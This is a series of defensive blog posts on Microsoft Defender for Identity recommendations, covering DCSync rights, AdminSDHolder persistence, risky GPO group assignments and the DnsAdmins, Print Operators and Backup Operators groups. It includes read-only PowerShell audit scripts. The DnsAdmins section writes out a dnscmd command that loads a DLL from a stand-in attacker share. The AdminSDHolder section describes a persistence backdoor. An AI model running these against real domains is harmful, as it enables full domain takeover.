Author: thalpius

Microsoft Defender for Identity Recommended Actions: Remove non-admin accounts with DCSync permissions

by thalpius
Microsoft Defender for Identity Recommended Actions: Remove non-admin accounts with DCSync permissions

Identity leverages Secure Score with twenty-seven recommended actions. In a series of blog posts, I will go through all twenty-seven recommended actions and what they mean, a plan of approach, their impact, and my security recommendations, hopefully helping others. The twenty-second  one in the series is the “Remove non-admin accounts with DCSync permissions” recommended action.

Introduction

You have twenty-seven recommendations if you filter the Secure Score recommended actions for Microsoft Defender for Identity.

Some recommended actions are easy to configure, but others require time, proper planning, auditing, and expertise. This blog post will review the recommended action of “Remove non-admin accounts with DCSync permissions.”

Update: Microsoft keeps updating the recommended actions list. I will do my best to keep the list up-to-date.

DCSync

DCSync is a technique that leverages specific Active Directory permissions to replicate data from a domain controller. Normally, only domain controllers use replication protocols to synchronize identity information, but with the right permissions, any account can request this replication, effectively acting like a domain controller. This means that an attacker, or even a misconfigured account, with DCSync permissions can extract sensitive information directly from AD, including password hashes, and sensitive information for privileged accounts, such as the krbtgt account.

If an attacker obtains the krbtgt account’s keys or hash, they can forge valid Kerberos Ticket Granting Tickets (TGT) and impersonate any user, including Domain Admins, across the domain. Because TGTs are cryptographically signed with the krbtgt key, forged tickets appear authentic to domain controllers and let attackers access resources stealthily and persistently, surviving password changes.

Remediation requires carefully rotating the krbtgt key, the recommended double reset, and thorough detection and containment, because until those keys are replaced, the attacker effectively holds the root of trust for Kerberos in your environment, owning the entire domain.

Replicating Directory Changes

Only a very small set of identities should ever hold Replicating Directory Changes rights. Domain Controller computer accounts need them by design so DCs can replicate AD between each other, and the Azure AD Connect sync account, whether a dedicated user account or a managed service account, needs them so it can read directory data to sync to Azure AD.

Image 1: Replication security permissions

In rare, short-lived scenarios, you might also grant the same rights to a vetted third-party directory migration or sync tool, but those permissions should be removed immediately after the project ends. No human user, application service account, or generic admin account requires replication rights for normal operations, giving those accounts replication privileges is over-permissioning and a major security risk.

Detection

While understanding the risk of DCSync is important, detection is just as crucial. This is where Microsoft Defender for Identity becomes valuable. Microsoft Defender for Identity continuously monitors your domain for accounts that hold replication permissions, highlighting those that are not domain controllers or the Azure AD Connect sync account. If such an account is discovered, it will be surfaced in the security assessment section, allowing you to quickly identify and respond to potential misuse.

Microsoft Defender for Identity does more than simply point out the problem. By tracking these findings against your Secure Score also helps you measure progress as you remove excessive permissions and harden your environment. Administrators can use this visibility to distinguish between accounts that legitimately require replication rights and those that were mistakenly over-privileged. Once identified, unnecessary rights should be revoked, and the assessment will reflect the reduced exposure.

Image 2: Detection by Microsoft Defender for Identity

This detection capability is crucial because DCSync attacks do not resemble normal logons. They appear as replication traffic, which often goes unnoticed in traditional monitoring. Without a tool like Microsoft Defender for Identity, dangerous accounts could quietly retain the ability to replicate sensitive secrets for years.

Conclusion

Securing replication rights in Active Directory is not just about preventing configuration mistakes, it is about closing off one of the most powerful attack techniques available to adversaries. DCSync turns an over-privileged account into a domain controller in disguise, capable of extracting the secrets that underpin your entire identity infrastructure. By keeping replication permissions limited to domain controllers and the Azure AD Connect sync account, and by using Microsoft Defender for Identity to continuously monitor for deviations, you reduce the chance of an attacker quietly gaining the keys to the kingdom. Identity is the new security boundary, and visibility into these permissions is an essential step in protecting it.

Microsoft Defender for Identity Recommended Actions: Remove local admins on identity assets

by thalpius
Microsoft Defender for Identity Recommended Actions: Remove local admins on identity assets

Identity leverages Secure Score with twenty-seven recommended actions. In a series of blog posts, I will go through all twenty-seven recommended actions and what they mean, a plan of approach, their impact, and my security recommendations, hopefully helping others. The twenty-first  one in the series is the “Remove local admins on identity assets” recommended action.

Introduction

You have twenty-seven recommendations if you filter the Secure Score recommended actions for Microsoft Defender for Identity.

Some recommended actions are easy to configure, but others require time, proper planning, auditing, and expertise. This blog post will review the recommended action of “Remove local admins on identity assets.”

Update: Microsoft keeps updating the recommended actions list. I will do my best to keep the list up-to-date.

Local Administrator

In highly sensitive environments, especially Tier-0 servers that safeguard core identity infrastructure such as Active Directory, Active Directory Federation Services, AD Connect, and Active Directory Certificate Services, minimizing the attack surface is critical. Allowing local administrator accounts on these systems creates a hidden pathway for attackers: from their perspective, every local admin is effectively a potential Domain Admin.

With elevated local rights, an attacker can manipulate services, extract credentials, or pivot laterally to compromise the broader identity fabric. Once Tier-0 assets are exposed, the entire enterprise identity ecosystem is at risk. For this reason, enforcing the principle of least privilege and removing unnecessary local administrators is a foundational control to prevent privilege escalation and maintain a secure environment.

Recommendation

Use Microsoft Defender for Identity to continuously monitor Tier-0 servers and identify accounts with local administrator privileges. Review the list of detected accounts on a regular basis and assess whether each one is truly required. For accounts that are not operationally necessary, remove their local administrator rights immediately. Where privileged access is required, replace permanent local admin rights with controlled access solutions such as Privileged Access Management (PAM) or Just-In-Time (JIT) access.

By leveraging Defender for Identity’s visibility into local admin memberships and remediating unnecessary privileges, you reduce the likelihood of attackers using these accounts as indirect entry points to escalate toward Domain Admin privileges.

Conclusion

In conclusion, the Remove local admins on identity assets assessment is not actively scanning your environment. Instead, it leverages the Microsoft security sensor installed on Tier-0 servers to identify which accounts hold local administrator rights. The recommendation is simply to review these detected accounts and remove unnecessary privileged access. By doing so, organizations reduce the risk of local admins being leveraged as indirect Domain Admins, strengthening the overall security posture of their Tier-0 assets.

Microsoft Defender for Identity Recommended Actions: Remove access rights on suspicious accounts with the Admin SDHolder permission

by thalpius
Microsoft Defender for Identity Recommended Actions: Remove access rights on suspicious accounts with the Admin SDHolder permission

Identity leverages Secure Score with twenty-seven recommended actions. In a series of blog posts, I will go through all twenty-seven recommended actions and what they mean, a plan of approach, their impact, and my security recommendations, hopefully helping others. The twentieth  one in the series is the “Remove access rights on suspicious accounts with the Admin SDHolder permission” recommended action.

Introduction

You have twenty-seven recommendations if you filter the Secure Score recommended actions for Microsoft Defender for Identity.

Some recommended actions are easy to configure, but others require time, proper planning, auditing, and expertise. This blog post will review the recommended action of “Remove access rights on suspicious accounts with the Admin SDHolder permission.”

Update: Microsoft keeps updating the recommended actions list. I will do my best to keep the list up-to-date.

AdminSDHolder

The AdminSDHolder is a special object in Active Directory that plays a key role in protecting high-privilege accounts and groups from unintentional or malicious changes to their permissions. It acts as a security template for accounts that are members of protected groups, such as Domain Admins, Enterprise Admins, and others with elevated privileges.

Image 1: AdminSDHolder Container

Every 60 minutes by default, a background process called SDProp (Security Descriptor Propagator) runs on the domain controller holding the PDC Emulator role. This process compares the security descriptors (permissions) of protected accounts to those of the AdminSDHolder object. If any differences are found, SDProp overwrites the permissions on the protected accounts to match those of the AdminSDHolder. This ensures that even if someone tries to modify the permissions on a protected account, those changes will be reverted during the next SDProp cycle.

The mechanism is crucial for maintaining the integrity and security of privileged accounts in an Active Directory environment. However, malicious actors found a way to use this mechanism for persistence.

Persistence

When an account is a member of a protected group, like Domain Admins, Active Directory marks it as a protected object. The AdminSDHolder object contains a predefined set of permissions, a security descriptor that is considered the “gold standard” for these protected accounts. Every 60 minutes, a background process called SDProp runs and reapplies the AdminSDHolder’s permissions to all protected accounts.

All the malicious actor needs to do is add an account to the security permissions of the AdminSDHolder container, with full permissions.

Image 2: Adding permissions to the AdminSDHolder container

If we look at the Domain Admin group permissions, we see that the “attackers” account is not yet set to the permissions of the Domain Admins group.

Image 3: No attacker account is found

Now, if we wait an hour or we force the SDProp process, we see that due to the process, the attacker’s account gets full control over the Domain Admins group.

Image 4: Account added to the Domain Admins group

Even if you remove the permissions on the protected object, like the Domain Admins group, an hour later, the attacker’s account gets full control again.

Luckily, Microsoft Defender for Identity provides detection for non-administrative accounts with permissions on the AdminSDHolder container.

Image 5: Microsoft Defender for Identity Recommended Action

Conclusion

The AdminSDHolder object is a powerful and essential component of Active Directory security, designed to safeguard privileged accounts from unauthorized changes. However, as with many security mechanisms, what protects can also be exploited. Attackers who gain access to modify the AdminSDHolder can use it as a stealthy and persistent backdoor, ensuring their control over critical accounts is automatically restored, even after cleanup attempts.

Understanding how AdminSDHolder works, how SDProp enforces its permissions, and how attackers can abuse this process is crucial for any security team. Fortunately, tools like Microsoft Defender for Identity can help detect suspicious modifications and provide early warnings. Regular audits, proper monitoring, and a strong understanding of Active Directory internals are key to defending against this type of persistence.

Stay vigilant, and make sure your defenses are as persistent as the threats you are protecting against.

Microsoft Defender for Identity Recommended Actions: GPO assigns unprivileged identities to local groups with elevated privileges

by thalpius
Microsoft Defender for Identity Recommended Actions: GPO assigns unprivileged identities to local groups with elevated privileges

Identity leverages Secure Score with twenty-seven recommended actions. In a series of blog posts, I will go through all twenty-seven recommended actions and what they mean, a plan of approach, their impact, and my security recommendations, hopefully helping others. The nineteenth  one in the series is the “GPO assigns unprivileged identities to local groups with elevated privileges” recommended action.

Introduction

You have twenty-seven recommendations if you filter the Secure Score recommended actions for Microsoft Defender for Identity.

Some recommended actions are easy to configure, but others require time, proper planning, auditing, and expertise. This blog post will review the recommended action of “GPO assigns unprivileged identities to local groups with elevated privileges.”

Update: Microsoft keeps updating the recommended actions list. I will do my best to keep the list up-to-date.

Group Policy Objects

A Group Policy Object (GPO) is a collection of settings in a Windows environment used to manage and control the working environment of user accounts and computer accounts within Active Directory. GPOs allow system administrators to centrally enforce rules such as password policies, software installation, desktop restrictions, and security settings. GPOs are linked to containers in Active Directory, such as sites, domains, or organizational units (OUs), and are automatically applied when a user logs in or a computer starts up. This ensures consistency, improves security, and reduces the need for manual configuration across multiple systems.

Local Users and Groups

A Group Policy Object (GPO) that adds a group like Everyone to the local Administrators group instructs all targeted computers to include that group as a member of their local admin group. This means that every user, regardless of role or privilege level, gains full administrative access to those systems. As a result, users can install software, change security settings, manage accounts, and even execute malicious code with full control. This creates a serious security risk, as it effectively removes privilege separation and opens the door for malicious actors or unprivileged users to compromise the entire environment.

Image 1: Local Users and Groups policy

Risks

Adding the Everyone group or similarly broad groups like Authenticated Users or Domain Users, to the local Administrators group via a Group Policy Object (GPO) introduces a significant security vulnerability. It grants full administrative rights to all users on affected machines, regardless of their intended access level. This breaks the principle of least privilege, which is essential for maintaining a secure and controlled environment. Any user, intentionally or not, would be able to make critical system changes, install or remove software, disable security features, or access sensitive data.

From a threat perspective, this configuration dramatically increases the attack surface. If a malicious actor gains access to any standard user account, they automatically inherit administrative privileges on every system governed by that GPO. This makes privilege escalation trivial and enables lateral movement across the network. Furthermore, malicious insiders or compromised devices can use this access to disable defenses, implant persistent threats, and exfiltrate data with little resistance. Such a misconfiguration undermines the entire security model of a Windows domain.

Security Assessment

Microsoft Defender for Identity monitors for this type of misconfiguration, such as adding broad groups like Everyone, Authenticated Users, or Domain Users to the local Administrators group, and reports it as a security issue within Microsoft Secure Score. This detection helps organizations identify and remediate risky privilege assignments that could allow unauthorized users to gain elevated access across multiple systems. By flagging this issue, Microsoft Defender for Identity supports proactive security posture management and encourages adherence to the principle of least privilege.

Identify Sensitive Groups

This PowerShell script scans all Group Policy Objects (GPOs) in an Active Directory domain to identify whether any of them use Group Policy Preferences to add sensitive groups, such as Everyone, Domain Users, or Authenticated Users, to local groups on domain-joined computers, especially the Administrators group. It searches for these configurations by parsing the Groups.xml files stored in the SYSVOL directory, which define local user and group modifications. If it detects any risky group memberships being assigned, it outputs the GPO name, affected group, the action performed, and the specific member added. This helps administrators identify and remediate dangerous privilege assignments that could expose systems to unauthorized access or lateral movement.

Import-Module GroupPolicy

# Define risky groups to check
$RiskyAccounts = @("Everyone", "Domain Users", "Authenticated Users")
$KnownSIDs = @("S-1-1-0", "S-1-5-11") # Known SIDs for Everyone and Authenticated Users

# Get domain and SYSVOL path
$Domain = (Get-ADDomain).DNSRoot
$SysvolPath = "\\$Domain\SYSVOL\$Domain\Policies"

# Get all GPOs
$GPOs = Get-GPO -All

foreach ($gpo in $GPOs) {
    # Check both Machine and User configurations
    $xmlPaths = @(
        "$SysvolPath\{$($gpo.Id)}\Machine\Preferences\Groups\Groups.xml",
        "$SysvolPath\{$($gpo.Id)}\User\Preferences\Groups\Groups.xml"
    )

    foreach ($xmlPath in $xmlPaths) {
        if (Test-Path $xmlPath) {
            try {
                [xml]$xml = Get-Content $xmlPath -ErrorAction Stop

                foreach ($group in $xml.Groups.Group) {
                    $groupName = $group.Properties.groupName
                    $action = $group.Properties.action

                    foreach ($member in $group.Properties.Members.Member) {
                        $name = $member.name
                        $sid = $member.sid

                        if ($RiskyAccounts -contains $name -or ($sid -and ($KnownSIDs | Where-Object { $sid -like "$_*" }))) {
                            [PSCustomObject]@{
                                GPO           = $gpo.DisplayName
                                XMLPath       = $xmlPath
                                LocalGroup    = $groupName
                                Action        = $action
                                MemberAdded   = $name
                                SID           = $sid
                            }
                        }
                    }
                }
            } catch {
                Write-Warning "Error reading XML in GPO $($gpo.DisplayName): $_"
            }
        }
    }
}

Identify Overly Permissive GPO

This PowerShell script audits all Group Policy Objects (GPOs) in an Active Directory domain to identify cases where broad or non-restrictive groups, such as Everyone, Authenticated Users, or Domain Users, have permissions to edit or fully control a GPO. Using the Get-GPPermissions cmdlet, the script examines the access control list of each GPO and filters for entries that grant Edit or FullControl rights to those groups. If any such permissions are found, it outputs the GPO name, the group with access, the permission type, and whether the access is inherited. This is critical for security because overly permissive GPO rights can allow unauthorized users to change group policy settings, potentially leading to privilege escalation or domain compromise.

Import-Module GroupPolicy

# Define risky groups to check for
$RiskyGroups = @("Everyone", "Authenticated Users", "Domain Users")

# Get all GPOs
$GPOs = Get-GPO -All

foreach ($gpo in $GPOs) {
    # Get permissions for each GPO
    $permissions = Get-GPPermissions -Guid $gpo.Id -All | Where-Object {
        $_.Permission -match 'Edit|FullControl' -and
        $RiskyGroups -contains $_.Trustee.Name
    }

    foreach ($perm in $permissions) {
        [PSCustomObject]@{
            GPOName       = $gpo.DisplayName
            Trustee       = $perm.Trustee.Name
            TrusteeType   = $perm.Trustee.SidType
            Permission    = $perm.Permission
            Inherited     = $perm.Inherited
        }
    }
}

Conclusion

Group Policy Objects (GPOs) are a powerful tool for managing and securing Windows environments, but they must be configured carefully to avoid introducing critical security risks. Adding broad groups like Everyone, Domain Users, or Authenticated Users to the local Administrators group, or granting them permissions to modify GPOs themselves, undermines the principle of least privilege and exposes systems to privilege escalation and lateral movement.

By proactively auditing GPO configurations, both in terms of local group membership and GPO access control, administrators can detect and remediate these high-risk settings before they are exploited. Tools like Microsoft Defender for Identity and PowerShell scripts that inspect Groups.xml files and GPO permissions provide essential visibility into these misconfigurations. Strengthening GPO hygiene is a key step toward securing the Active Directory environment and maintaining operational integrity.

Microsoft Defender for Identity Recommended Actions: Unsafe permissions on the DnsAdmins group

by thalpius
Microsoft Defender for Identity Recommended Actions: Unsafe permissions on the DnsAdmins group

Microsoft Secure Score helps organizations get insights into security posture based on security-related measurements. Microsoft Defender for Identity leverages Secure Score with twenty-seven recommended actions. In a series of blog posts, I will go through all twenty-seven recommended actions and what they mean, a plan of approach, their impact, and my security recommendations, hopefully helping others. The eighteenth one in the series is the “Unsafe permissions on the DnsAdmins group” recommended action.

Introduction

You have twenty-seven recommendations if you filter the Secure Score recommended actions for Microsoft Defender for Identity.

Some recommended actions are easy to configure, but others require time, proper planning, auditing, and expertise. This blog post will review the recommended action of “Unsafe permissions on the DnsAdmins group.”

Update: Microsoft keeps updating the recommended actions list. I will do my best to keep the list up-to-date.

DnsAdmins

The Microsoft documentation mentions the DnsAdmins group as a high-privilege group. In addition to the default permissions, Shay Ber found a privilege escalation when you are a member of the DnsAdmins group.

The idea is simple: When you are a member of the DnsAdmins group, you can set a registry key to set a path to a Dynamic Link Library (DLL) using DNSCMD using the following command.

dnscmd.exe /config /serverlevelplugindll \\attacker\temp\malicious.dll
Image 1: DNSCMD command

Here is the registry key set by the DNSCMD command:

Image 2: Registry key set by DNSCMD

This command sets a registry key instructing the DNS server to load a DLL from a specified path. Once the DNS service restarts, whether manually or automatically, the DLL is loaded into the DNS process with SYSTEM-level privileges.

This is especially alarming because DNS services are frequently hosted on Domain Controllers. In such scenarios, gaining control over the DNS service means gaining control over the Domain Controller itself. In turn, this could allow an attacker to take over the entire Active Directory domain, and potentially even the entire forest.

To its credit, Microsoft Defender for Identity does flag low-privileged users who are members of the DnsAdmins group. However, this is just the tip of the iceberg.

Print Operators

The Print Operators group is often misunderstood as being low-risk, but this could not be further from the truth. Members of this group have permissions that allow them to:

  • Load and unload device drivers
  • Log on locally to Domain Controllers
  • Shut down the server

Driver loading, in particular, can be an attack vector. A user could craft or deploy a malicious driver that executes with elevated privileges, opening the door to full system compromise. In essence, if a threat actor compromises a user account with Print Operators membership, they gain a reliable path to escalate privileges.

What makes this group especially dangerous is that its risks are often undocumented or underrepresented in common auditing practices. Defender for Identity does not currently flag Print Operators the way it flags DnsAdmins, which means these users could easily slip through the cracks of privilege audits.

Backup Operators

Similarly, Backup Operators hold more power than their name might suggest. This group allows its members to:

  • Bypass file and folder permissions
  • Backup and restore all files, including protected system files
  • Access data even on Domain Controllers

This essentially gives users the ability to exfiltrate sensitive data or restore manipulated system files. With access to sensitive NTDS.dit files or SYSTEM registry hives, an attacker could extract credentials or plant persistent backdoors. Like Print Operators, the Backup Operators group is not widely monitored, and many organizations mistakenly consider it low-risk.

Conclusion

While Microsoft Defender for Identity provides valuable alerts for DnsAdmins group membership, relying solely on these alerts creates blind spots. Print Operators and Backup Operators are equally capable of enabling privilege escalation and lateral movement within your environment.

To better protect your Active Directory infrastructure:

  • Regularly audit group memberships, especially in legacy or hybrid environments
  • Consider implementing tiered administrative models to isolate high-risk roles
  • Monitor the use of sensitive tools like dnscmd.exe

Privilege is power, and in Active Directory, that power is not always where you expect it to be. Do not let overlooked groups become your weakest link.